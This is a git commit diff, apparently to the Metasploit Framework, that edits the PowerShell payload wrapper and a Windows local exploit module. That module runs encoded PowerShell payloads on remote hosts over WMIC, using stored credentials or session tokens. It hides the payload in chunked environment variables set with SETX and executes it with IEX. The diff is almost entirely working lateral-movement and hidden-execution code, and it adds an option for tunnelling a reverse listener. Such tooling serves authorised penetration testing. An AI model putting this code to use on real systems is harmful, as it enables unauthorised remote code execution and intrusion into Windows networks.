Correct powershell

2013-09-20 18:36:24 +01:00 · 2013-09-20 18:36:24 +01:00 · 7d1c5c732a
parent 9819566d94
commit 7d1c5c732a
2 changed files with 15 additions and 24 deletions
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@ -116,7 +116,7 @@ module Exploit::Powershell

    ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = '#{ps_bin}'
+$si.FileName = #{ps_bin}
 $si.Arguments = '#{ps_args}'
 $si.UseShellExecute = $false
 $si.RedirectStandardOutput = $true
@ -146,7 +146,7 @@ EOS
      psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
    end
    # Determine appropriate architecture
-    ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
    # Wrap in hidden runtime
    psh_payload = run_hidden_psh(psh_payload,ps_bin)
    # Convert to base64 for -encodedcommand execution
--- a/modules/exploits/windows/local/wmis.rb
+++ b/modules/exploits/windows/local/wmis.rb
@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Local
          This module executes powershell on the remote host using the current
          user credentials or those supplied. Instead of using PSEXEC over TCP
          port 445 we use the WMIC command to start a Remote Procedure Call on
-          TCP port 135 and an ephemeral port.
+          TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
+          traffic through that session.

          The result is similar to psexec but with the added benefit of using
          the session's current authentication token instead of having to know
@ -29,6 +30,9 @@ class Metasploit3 < Msf::Exploit::Local
          We do not get feedback from the WMIC command so there are no
          indicators of success or failure. The remote host must be configured
          to allow remote Windows Management Instrumentation.
+
+          N.B. This module will not work with the local administrator account
+          due to the way the environment variables are stored as SYSTEM acc.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
@ -61,6 +65,8 @@ class Metasploit3 < Msf::Exploit::Local
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
+      # Move this out of advanced
+      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
    ])
  end

@ -70,6 +76,10 @@ class Metasploit3 < Msf::Exploit::Local
    end

    Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
+      # TODO: CHECK WMIC Access by reading the clipboard?
+      # TODO: wmic /output:clipboard
+      # TODO: Needs to be meterpreter ext side due to threading
+
      # Get the PSH Payload and split it into bitesize chunks
      # 1024 appears to be the max value allowed in env vars
      psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
@ -81,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Local
      env_vars = []
      0.upto(chunks.length-1) do |i|
        env_vars << "#{env_name}#{i}"
-        c = "cmd /c SETX #{setx_user_pass_string}#{env_vars[i]} \"#{chunks[i]}\""
+        c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\""
        wmic_command(server, c)
      end

@ -89,12 +99,10 @@ class Metasploit3 < Msf::Exploit::Local
      env_vars.each do |env|
        exec_cmd << "+$env:#{env}"
      end
-      exec_cmd << ";$x >> c:\\parp.txt;IEX $x;"
+      exec_cmd << ";IEX $x;"

      print_status("[#{server}] Executing payload")
-      sleep(10)
      wmic_command(server, exec_cmd)
-      sleep(10)

      print_status("[#{server}] Cleaning up environment variables")
      env_vars.each do |env|
@ -104,23 +112,6 @@ class Metasploit3 < Msf::Exploit::Local
    end
  end

-  # If we are local administrator then environment variables are stored as
-  # SYSTEM in S-1-5-18 instead of the Administrator -500 HKCU store so we
-  # need to ensure we set the env vars for the current user!
-  def setx_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
-    userpass = ""
-
-    unless user.nil?
-      if domain.nil?
-        userpass = "/s 127.0.0.1 /u #{user} /p #{pass} "
-      else
-        userpass = "/s 127.0.0.1 /u #{domain}\\#{user} /p #{pass} "
-      end
-    end
-
-    return userpass
-  end
-
  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
    userpass = ""